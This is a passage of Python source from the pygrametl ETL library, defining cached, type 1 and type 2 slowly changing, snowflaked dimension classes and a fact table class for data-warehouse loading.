searchtuple = tuple([row[n] for n in namesinrow])
return self.__vals2key.get(searchtuple, None)
def _after_lookup(self, row, namemapping, resultkey):
if resultkey is not None and (self.defaultidvalue is None or
resultkey != self.defaultidvalue):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.__vals2key[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.cachefullrows:
res = self.__key2row.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.cachefullrows and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.__key2row[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if ((att in namemapping and
namemapping[att] in row) or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.__vals2key:
del self.__vals2key[searchtuple]
break
if self.cachefullrows:
if row[key] in self.__key2row:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.__key2row[row[key]]
return None
def _after_update(self, row, namemapping):
""" """
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached and we sometimes avoid looking in the DB.
# Therefore, we have to update the cache now. In _before_update,
# we deleted the cached data.
keyval = row[(namemapping.get(self.key) or self.key)]
newrow = self.getbykey(keyval) # This also updates __key2row
self._after_lookup(newrow, {}, keyval) # Updates __vals2key
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look the row up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
if self.cacheoninsert:
self._after_lookup(row, namemapping, newkeyvalue)
if self.cachefullrows:
tmp = pygrametl.project(self.all, row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
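# A hypothetical sketch of CachedDimension usage; the names are invented.
# The lookup/ensure/insert interface is the same as for Dimension, but hits
# can be served from the cache, optionally prefilled from the database:
#
#   datedim = CachedDimension(name='date', key='dateid',
#                             attributes=['date', 'year', 'month', 'day'],
#                             lookupatts=['date'],
#                             size=5000, prefill=True, cachefullrows=True)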
class TypeOneSlowlyChangingDimension(CachedDimension):
"""A class for accessing a slowly changing dimension of "type 1".
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, type1atts=(),
cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
          a dimension member. These attributes are thus used for looking
up members.
- type1atts: A sequence of attributes that should have type1 updates
          applied; it must not intersect with lookupatts. If not given, it is
assumed that type1atts = attributes - lookupatts
- cachesize: the maximum number of rows to cache. If less than or
equal to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
          clause is used when prefill is True. Depending on the used DBMS
          and DB driver, this can give significant savings wrt. time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
size=cachesize,
prefill=prefill,
cachefullrows=False,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
if type1atts == ():
type1atts = list(set(attributes) - set(lookupatts))
elif not set(type1atts) < set(attributes):
raise ValueError("Type1atts is not a subset of attributes")
elif set(lookupatts) & set(type1atts):
raise ValueError("Intersection between lookupatts and type1atts")
# Ensures "lookupatts != attributes" as it prevents type 1 updates
if not len(type1atts):
raise ValueError("Type1atts contain no attributes")
self.type1atts = type1atts
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the table. It must
contain all attributes if it is the first version of the row to be
          inserted; updates of existing rows need only contain lookupatts
          and a subset of type1atts, as missing type1atts are ignored and
          the existing values are left as-is in the database.
- namemapping: an optional namemapping (see module's documentation)
"""
# NOTE: the "vals2key" cache is kept coherent by "scdensure", as it only
# contains "lookupatts" which "scdensure" is prohibited from changing
keyval = self.lookup(row, namemapping)
key = (namemapping.get(self.key) or self.key)
if keyval is None:
# The first version of the row is inserted
keyval = self.insert(row, namemapping)
row[key] = keyval
else:
# The row did exist so we update the type1atts provided
row[key] = keyval
# Takes the user provided namemapping into account and checks what
# subset of type1atts should be updated based on the content of row
type1atts = []
for att in self.type1atts:
if (namemapping.get(att) or att) in row:
type1atts.append(att)
if not type1atts:
return
# The SQL is constructed to update only the changed values without
# the need for looking up the old row to extract the existing
# values
updatesql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % \
(att, att) for att in type1atts]) + \
" WHERE %s = %%(%s)s" % (key, key)
# Update is not used, to skip the checks for updates to the caches
self.targetconnection.execute(updatesql, row, namemapping)
return row[key]
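# A hypothetical sketch of a type 1 slowly changing dimension; the names are
# invented. scdensure inserts unseen members and overwrites the type1atts of
# existing members in place:
#
#   customerdim = TypeOneSlowlyChangingDimension(
#       name='customer', key='customerid',
#       attributes=['email', 'city', 'segment'],
#       lookupatts=['email'], type1atts=['city', 'segment'])
#   customerdim.scdensure({'email': 'a@example.com', 'city': 'Aalborg',
#                          'segment': 'retail'})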
class SlowlyChangingDimension(Dimension):
"""A class for accessing a slowly changing dimension of "type 2".
"Type 1" updates can also be applied for a subset of the attributes.
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, versionatt,
fromatt=None, fromfinder=None,
toatt=None, tofinder=None, minfrom=None, maxto=None,
srcdateatt=None, srcdateparser=pygrametl.ymdparser,
type1atts=(), cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument, but should include versionatt,
fromatt, and toatt.
- lookupatts: a sequence with a subset of the attributes that
          uniquely identify a dimension member. These attributes are thus
used for looking up members.
- versionatt: the name of the attribute holding the version number
- fromatt: the name of the attribute telling from when the version
becomes valid. Not used if None. Default: None
- fromfinder: a function(targetconnection, row, namemapping)
returning a value for the fromatt for a new version (the function
is first used when it is determined that a new version must be
added; it is not applied to determine this).
If fromfinder is None and srcdateatt is also None,
pygrametl.today is used as fromfinder. If fromfinder is None
and srcdateatt is not None,
pygrametl.datereader(srcdateatt, srcdateparser) is used.
In other words, if no date attribute and no special
date function are given, new versions get the date of the current
day. If a date attribute is given (but no date function), the
date attribute's value is converted (by means of srcdateparser)
and a new version gets the result of this as the date it is valid
from. Default: None
- toatt: the name of the attribute telling until when the version
is valid. Not used if None. Default: None
- tofinder: a function(targetconnection, row, namemapping)
returning a value for the toatt. If not set, fromfinder is used
(note that if fromfinder is None, it is set to a default
function -- see the comments about fromfinder. The possibly
modified value is used here.) Default: None
- minfrom: the value to use for fromatt for the 1st version of a
member if fromatt is not already set. If None, the value is
found in the same way as for other new versions, i.e., as
described for fromfinder. If fromatt should take the value
NULL for the 1st version, set minfrom to a tuple holding a single
          element which is None: (None,). Note that minfrom affects the 1st
version, not any following versions. Note also that if the member
to insert already contains a value for fromatt, minfrom is ignored.
Default: None.
- maxto: the value to use for toatt for new members. Default: None
- srcdateatt: the name of the attribute in the source data that
holds a date showing when a version is valid from. The data is
converted to a datetime by applying srcdateparser on it.
If not None, the date attribute is also used when comparing
a potential new version to the newest version in the DB.
If None, the date fields are not compared. Default: None
- srcdateparser: a function that takes one argument (a date in the
format scrdateatt has) and returns a datetime.datetime.
If srcdateatt is None, srcdateparser is not used.
Default: pygrametl.ymdparser (i.e., the default value is a
function that parses a string of the form 'yyyy-MM-dd')
- type1atts: a sequence of attributes that should have type1 updates
applied. Default: ()
- cachesize: the maximum size of the cache. 0 disables caching
          and values smaller than 0 allow unlimited caching
- prefill: decides if the cache should be prefilled with the newest
versions. Default: False. NB: This is a new argument in ver. 0.2.0.
- idfinder: a function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
          clause is used when prefill is True. Depending on the used DBMS
          and DB driver, this can give significant savings wrt. time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
# TODO: Should scdensure just override ensure instead of being a new
# method?
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
targetconnection=targetconnection)
if not versionatt:
raise ValueError('A version attribute must be given')
self.versionatt = versionatt
self.fromatt = fromatt
if fromfinder is not None:
self.fromfinder = fromfinder
elif srcdateatt is not None: # and fromfinder is None
self.fromfinder = pygrametl.datereader(srcdateatt, srcdateparser)
else: # fromfinder is None and srcdateatt is None
self.fromfinder = pygrametl.today
self.toatt = toatt
if tofinder is None:
tofinder = self.fromfinder
self.tofinder = tofinder
self.minfrom = minfrom
self.maxto = maxto
self.srcdateatt = srcdateatt
self.srcdateparser = srcdateparser
self.type1atts = type1atts
if cachesize > 0:
self.rowcache = FIFODict(cachesize)
self.keycache = FIFODict(cachesize)
elif cachesize < 0:
self.rowcache = {}
self.keycache = {}
# else cachesize == 0 and we do not create any caches
self.__cachesize = cachesize
self.__prefill = prefill
# Check that versionatt, fromatt and toatt are also declared as
# attributes
for var in (versionatt, fromatt, toatt):
if var and var not in attributes:
raise ValueError("%s not present in attributes argument" %
(var,))
# Now extend the SQL from Dimension such that we use the versioning
self.keylookupsql += " ORDER BY %s DESC" % (versionatt,)
if toatt:
self.updatetodatesql = \
"UPDATE %s SET %s = %%(%s)s WHERE %s = %%(%s)s" % \
(name, toatt, toatt, key, key)
if prefill:
self.__prefillcaches(usefetchfirst)
def __prefillcaches(self, usefetchfirst):
args = None
if self.toatt:
# We can use the toatt to see if rows are still current.
# Select all attributes from the rows where maxto is set to the
# default value (which may be NULL)
sql = 'SELECT %s FROM %s WHERE %s %s' % \
(', '.join(self.all), self.name, self.toatt,
self.maxto is None and 'IS NULL' or '= %(maxto)s')
if self.maxto is not None:
args = {'maxto': self.maxto}
else:
# We have to find max(versionatt) for each group of lookupatts and
# do a join to get the right rows.
lookupattlist = ', '.join(self.lookupatts)
newestversions = ('SELECT %s, MAX(%s) AS %s FROM %s GROUP BY %s' %
(lookupattlist, self.versionatt, self.versionatt, self.name,
lookupattlist))
joincond = ' AND '.join(['A.%s = B.%s' % (att, att) for att in
[l for l in self.lookupatts] +
[self.versionatt]
])
sql = 'SELECT %s FROM (%s) AS A, %s AS B WHERE %s' %\
(', '.join(['B.%s AS %s' % (att, att) for att in self.all]),
newestversions, self.name, joincond)
# sql is a statement that fetches the newest versions from the database
        # in order to fill the caches. The FETCH FIRST clause is only added for
        # a finite cache, and only if the user has flagged that the database
        # supports it.
positions = [self.all.index(att) for att in self.lookupatts]
if self.__cachesize > 0 and usefetchfirst:
sql += ' FETCH FIRST %d ROWS ONLY' % self.__cachesize
self.targetconnection.execute(sql, args)
for rawrow in self.targetconnection.fetchmanytuples(self.__cachesize):
self.rowcache[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.keycache[t] = rawrow[0]
def lookup(self, row, namemapping={}):
"""Find the key for the newest version with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
if self.__prefill and (self.__cachesize < 0 or
len(self.keycache) < self.__cachesize):
# Everything is cached. We don't have to look in the DB
return self._before_lookup(row, namemapping)
else:
# Something is not cached so we have to use the classical lookup.
# Note that __init__ updated self.keylookupsql to use ORDER BY ...
return Dimension.lookup(self, row, namemapping)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
key, versionatt, fromatt, and toatt are not required to be
present but will be added (if defined).
- namemapping: an optional namemapping (see module's documentation)
"""
versionatt = (namemapping.get(self.versionatt) or self.versionatt)
key = (namemapping.get(self.key) or self.key)
if self.fromatt: # this protects us against None in namemapping.
fromatt = (namemapping.get(self.fromatt) or self.fromatt)
else:
fromatt = None
if self.toatt:
toatt = (namemapping.get(self.toatt) or self.toatt)
else:
toatt = None
if self.srcdateatt:
srcdateatt = (namemapping.get(self.srcdateatt) or self.srcdateatt)
else:
srcdateatt = None
# Get the newest version and compare to that
keyval = self.lookup(row, namemapping)
if keyval is None:
# It is a new member. We add the first version.
row[versionatt] = 1
if fromatt and fromatt not in row:
if self.minfrom is not None:
# We need the following hack to distinguish between
# 'not set' and 'use the value None'...
if self.minfrom == (None,):
row[fromatt] = None
else:
row[fromatt] = self.minfrom
else:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt and toatt not in row:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
return row[key]
else:
# There is an existing version. Check if the attributes are
# identical
type1updates = {} # for type 1
addnewversion = False # for type 2
other = self.getbykey(keyval) # the full existing version
for att in self.all:
# Special (non-)handling of versioning and key attributes:
if att in (self.key, self.versionatt, self.toatt):
# Don't compare these - we don't expect them to have
# meaningful values in row
continue
# We may have to compare the "from dates"
elif att == self.fromatt:
if self.srcdateatt is None: # We don't compare dates then
continue
else:
# We have to compare the dates in row[..] and other[..].
# We have to make sure that the dates are of comparable
# types.
rdt = self.srcdateparser(row[srcdateatt])
if rdt == other[self.fromatt]:
continue # no change in the "from attribute"
elif isinstance(rdt, type(other[self.fromatt])):
# they are not equal but are of the same type, so we
# are dealing with a new date
addnewversion = True
else:
# They have different types (and are thus not
# equal). Try to convert to strings and see if they
# are equal.
modref = self.targetconnection.getunderlyingmodule()
rowdate = modref.Date(rdt.year, rdt.month, rdt.day)
if str(rowdate).strip('\'"') != \
str(other[self.fromatt]).strip('\'"'):
addnewversion = True
# Handling of "normal" attributes:
else:
mapped = (namemapping.get(att) or att)
if row[mapped] != other[att]:
if att in self.type1atts:
type1updates[att] = row[mapped]
else:
addnewversion = True
if addnewversion and not self.type1atts:
# We don't have to look for possible type 1 updates
# and we already know that a type 2 update is needed.
break
# else: continue
if len(type1updates) > 0:
# Some type 1 updates were found
self.__performtype1updates(type1updates, other)
if addnewversion: # type 2
# Make a new row version and insert it
row.pop(key, None)
row[versionatt] = other[self.versionatt] + 1
if fromatt:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
# Update the todate attribute in the old row version in the DB.
if toatt:
toattval = self.tofinder(self.targetconnection, row,
namemapping)
self.targetconnection.execute(
self.updatetodatesql, {
self.key: keyval, self.toatt: toattval})
# Only cache the newest version - this is new in ver. 0.2.0!
if keyval in self.rowcache:
del self.rowcache[keyval]
else:
# Update the row dict by giving version and dates and the key
row[key] = keyval
row[versionatt] = other[self.versionatt]
if self.fromatt:
row[fromatt] = other[self.fromatt]
if self.toatt:
row[toatt] = other[self.toatt]
return row[key]
def _before_lookup(self, row, namemapping):
if self.__cachesize:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.keycache.get(searchtuple, None)
return None
def _after_lookup(self, row, namemapping, resultkey):
if self.__cachesize and resultkey is not None:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.keycache[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.__cachesize:
res = self.rowcache.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.__cachesize and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.rowcache[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if (att in namemapping or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.keycache:
del self.keycache[searchtuple]
break
if row[key] in self.rowcache:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.rowcache[row[key]]
return None
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look it up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
# Note that we always cache inserted members (in CachedDimension
# this is an option).
if self.__cachesize:
self._after_lookup(row, namemapping, newkeyvalue)
tmp = pygrametl.project(self.all[1:], row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
def __performtype1updates(self, updates, lookupvalues, namemapping={}):
""" """
# find the keys in the rows that should be updated
self.targetconnection.execute(self.keylookupsql, lookupvalues,
namemapping)
updatekeys = [e[0] for e in self.targetconnection.fetchalltuples()]
updatekeys.reverse()
# Generate SQL for the update
valparts = ", ".join(["%s = %%(%s)s" % (k, k) for k in updates])
keyparts = ", ".join([str(k) for k in updatekeys])
sql = "UPDATE %s SET %s WHERE %s IN (%s)" % \
(self.name, valparts, self.key, keyparts)
self.targetconnection.execute(sql, updates)
# Remove from our own cache
for key in updatekeys:
if key in self.rowcache:
del self.rowcache[key]
SCDimension = SlowlyChangingDimension
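# A hypothetical sketch of a type 2 slowly changing dimension; the names are
# invented. scdensure adds a new version (with updated version/from/to
# attributes) whenever a tracked attribute changes:
#
#   customerdim = SlowlyChangingDimension(
#       name='customer', key='customerid',
#       attributes=['email', 'city', 'version', 'validfrom', 'validto'],
#       lookupatts=['email'], versionatt='version',
#       fromatt='validfrom', toatt='validto', cachesize=5000)
#   customerdim.scdensure({'email': 'a@example.com', 'city': 'Aalborg'})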
# NB: SnowflakedDimension's methods may have side-effects:
# row[somedim.key] = someval.
class SnowflakedDimension(object):
"""A class for accessing a snowflaked dimension spanning several tables
in the underlying database. Lookups and inserts are then automatically
spread out over the relevant tables while the programmer only needs
to interact with a single SnowflakedDimension instance.
"""
def __init__(self, references, expectboguskeyvalues=False):
"""Arguments:
- references: a sequence of pairs of Dimension objects
[(a1,a2), (b1,b2), ...] meaning that a1 has a foreign key to a2
etc. a2 may itself be a sequence of Dimensions:
[(a1, [a21, a22, ...]), (b1, [b21, b22, ...]), ...].
The first element of the first pair (a1 in the example above) must
be the dimension table representing the lowest level in the
hierarchy (i.e., the dimension table the closest to the fact
table).
Each dimension must be reachable in a unique way (i.e., the
given dimensions form a tree).
A foreign key must have the same name as the primary key it
references.
- expectboguskeyvalues: If expectboguskeyvalues is True, we allow a
key that is used as lookup attribute in a lower level to hold a
wrong value (which would typically be None). When ensure or
insert is called, we find the correct value for the key in the
higher level. If expectboguskeyvalues, we again try a lookup on
the lower level after this. If expectboguskeyvalues is False, we
move directly on to do an insert. Default: False
"""
self.root = references[0][0]
self.targetconnection = self.root.targetconnection
self.key = self.root.key
self.lookupatts = self.root.lookupatts
dims = set([self.root])
self.refs = {}
self.refkeys = {}
self.all = self.root.all[:]
for (dim, refeddims) in references:
# Check that all dimensions use the same target connection.
# Build the dict self.refs:
# {dimension -> set(refed dimensions)}
# Build self.all from dimensions' lists
# Keep track of seen dimensions by means of the set dims and
# ensure that each table is only reachable once.
if isinstance(refeddims, Dimension):
# If there is only one dimension, then make a tuple with that
refeddims = (refeddims, )
for rd in refeddims:
if rd.targetconnection is not self.targetconnection:
raise ValueError("Different connections used")
if rd in dims:
raise ValueError("The tables do not form a tree")
dims.add(rd)
tmp = self.refs.get(dim, set())
tmp.add(rd)
self.refs[dim] = tmp
                # The key is already there as we assume FKs and PKs have
# identical names
self.all.extend(list(rd.attributes))
# Check that all dimensions in dims are reachable from the root
dimscopy = dims.copy()
dimscopy.remove(self.root)
for (tbl, targets) in self.refs.items():
for target in targets:
# It is safe to use remove as each dim is only referenced once
dimscopy.remove(target)
# Those dimensions that are left in dims at this point are unreachable
if len(dimscopy) != 0:
raise ValueError("Not every given dimension is reachable")
# Construct SQL...
self.keylookupsql = self.root.keylookupsql
self.allnames = []
for dim in dims:
for att in dim.attributes:
self.allnames.append(att)
# Make sure that there are no duplicated names:
if len(self.allnames) != len(set(self.allnames)):
raise ValueError("Duplicated attribute names found")
self.alljoinssql = "SELECT " + ", ".join(self.allnames) + \
" FROM " + " NATURAL JOIN ".join(map(lambda d: d.name, dims))
self.rowlookupsql = self.alljoinssql + " WHERE %s.%s = %%(%s)s" % \
(self.root.name, self.root.key, self.root.key)
self.levels = {}
self.__buildlevels(self.root, 0)
self.levellist = list(range(len(self.levels)))
self.levellist.reverse()
self.expectboguskeyvalues = expectboguskeyvalues
def __buildlevels(self, node, level):
tmp = self.levels.get(level, [])
tmp.append(node)
self.levels[level] = tmp
for ref in self.refs.get(node, []):
self.__buildlevels(ref, level + 1)
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
which all must come from the root (the table closest to the
fact table).
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(row, namemapping)
if res:
return res
res = self.root.lookup(row, namemapping)
self._after_lookup(row, namemapping, res)
return res
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue, fullrow=False):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
Arguments:
- keyvalue: the key value of the row to lookup
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbykey(keyvalue, fullrow)
if res:
return res
if not fullrow:
res = self.root.getbykey(keyvalue)
else:
self.targetconnection.execute(self.rowlookupsql,
{self.root.key: keyvalue})
res = self.targetconnection.fetchone(self.allnames)
self._after_getbykey(keyvalue, res, fullrow)
return res
def _before_getbykey(self, keyvalue, fullrow=False):
return None
def _after_getbykey(self, keyvalue, resultrow, fullrow=False):
pass
def getbyvals(self, values, namemapping={}, fullrow=False):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
if not fullrow:
res = self.root.getbyvals(values, namemapping)
else:
# select all attributes from the table.
# The attributes available from the
# values dict are used in the WHERE clause.
attstouse = [a for a in self.allnames
if a in values or a in namemapping]
sqlwhere = " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(self.alljoinssql + sqlwhere,
values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.allnames)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping, fullrow=False):
return None
def _after_getbyvals(self, values, namemapping, resultrows, fullrow=False):
pass
def update(self, row, namemapping={}):
"""Update rows in the participating dimension tables.
If the key of a participating dimension D is in the given row,
D.update(...) is invoked.
Note that this function is not good to use for updating a foreign
key which here has the same name as the referenced primary key: The
referenced table could then also get updated unless it is ensured
that none of its attributes are present in the given row.
In other words, it is often better to use the update function
directly on the Dimensions that should be updated.
Arguments:
- row: a dict. If the key of a participating dimension D is in the
dict, D.update(...) is invoked.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res is not None:
return
for l in self.levellist:
for t in self.levels[l]:
if t.key in row or \
(t.key in namemapping and namemapping[t.key] in row):
t.update(row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given member. If that fails, insert it. Return key value.
If the member must be inserted, data is automatically inserted in
all participating tables where (part of) the member is not
already represented.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
(key, ignored) = self.__ensure_helper(self.root, row, namemapping,
False)
return key
def insert(self, row, namemapping={}):
"""Insert the given member. If that fails, insert it. Return key value.
Data is automatically inserted in all participating tables where
(part of) the member is not already represented. If nothing is
inserted at all, a ValueError is raised.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_insert(row, namemapping)
if key is not None:
return key
(key, insertdone) = self.__ensure_helper(self.root, row, namemapping,
False)
if not insertdone:
raise ValueError("Member already present - nothing inserted")
self._after_insert(row, namemapping, key)
return key
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def endload(self):
"""Finalize the load."""
pass
def __ensure_helper(self, dimension, row, namemapping, insertdone):
""" """
# NB: Has side-effects: Key values are set for all dimensions
key = None
retry = False
try:
key = dimension.lookup(row, namemapping)
except KeyError:
retry = True # it can happen that the keys for the levels above
# aren't there yet but should be used as lookup
# attributes in dimension.
# Below we find them and we should then try a
# lookup again before we move on to do an insertion
if key is not None:
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
# Else recursively get keys for refed tables and then insert
for refed in self.refs.get(dimension, []):
(key, insertdone) = self.__ensure_helper(refed, row, namemapping,
insertdone)
# We don't need to set the key value in the row as this already
# happened in the recursive step.
# We set insertdone = True to know later that we actually
# inserted something
if retry or self.expectboguskeyvalues:
# The following is similar to
# key = dimension.ensure(row, namemapping)
# but we set insertdone here.
key = dimension.lookup(row, namemapping)
if key is None:
key = dimension.insert(row, namemapping)
insertdone = True
else:
# We don't need to lookup again since no attributes were
# missing (no KeyError) and we don't expect bogus values.
# So we can proceed directly to do an insert.
key = dimension.insert(row, namemapping)
insertdone = True
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Warning::
Still experimental!!! For now we require that only the
root is a SlowlyChangingDimension.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
- namemapping: an optional namemapping (see module's documentation)
"""
# Still experimental!!! For now we require that only the
# root is a SlowlyChangingDimension.
# If we were to allow other nodes to be SCDs, we should require
# that those between those nodes and the root (incl.) were also
# SCDs.
for dim in self.levels.get(1, []):
(keyval, ignored) = self.__ensure_helper(dim, row, namemapping,
False)
row[(namemapping.get(dim.key) or dim.key)] = keyval
row[(namemapping.get(self.root.key) or self.root.key)] = \
self.root.scdensure(row, namemapping)
return row[(namemapping.get(self.root.key) or self.root.key)]
class FactTable(object):
"""A class for accessing a fact table in the DW."""
def __init__(self, name, keyrefs, measures=(), targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
self.targetconnection = targetconnection
self.name = name
self.keyrefs = keyrefs
self.measures = measures
self.all = [k for k in keyrefs] + [m for m in measures]
pygrametl._alltables.append(self)
# Create SQL
# INSERT INTO name (key1, ..., keyn, meas1, ..., measn)
# VALUES (%(key1)s, ..., %(keyn)s, %(meas1)s, ..., %(measn)s)
self.insertsql = "INSERT INTO " + name + "(" + \
", ".join(self.all) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
# SELECT key1, ..., keyn, meas1, ..., measn FROM name
# WHERE key1 = %(key1)s AND ... keyn = %(keyn)s
self.lookupsql = "SELECT " + ",".join(self.all) + " FROM " + name + \
" WHERE " + " AND ".join(["%s = %%(%s)s" % (k, k)
for k in self.keyrefs])
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
tmp = self._before_insert(row, namemapping)
if tmp:
return
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping)
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping):
pass
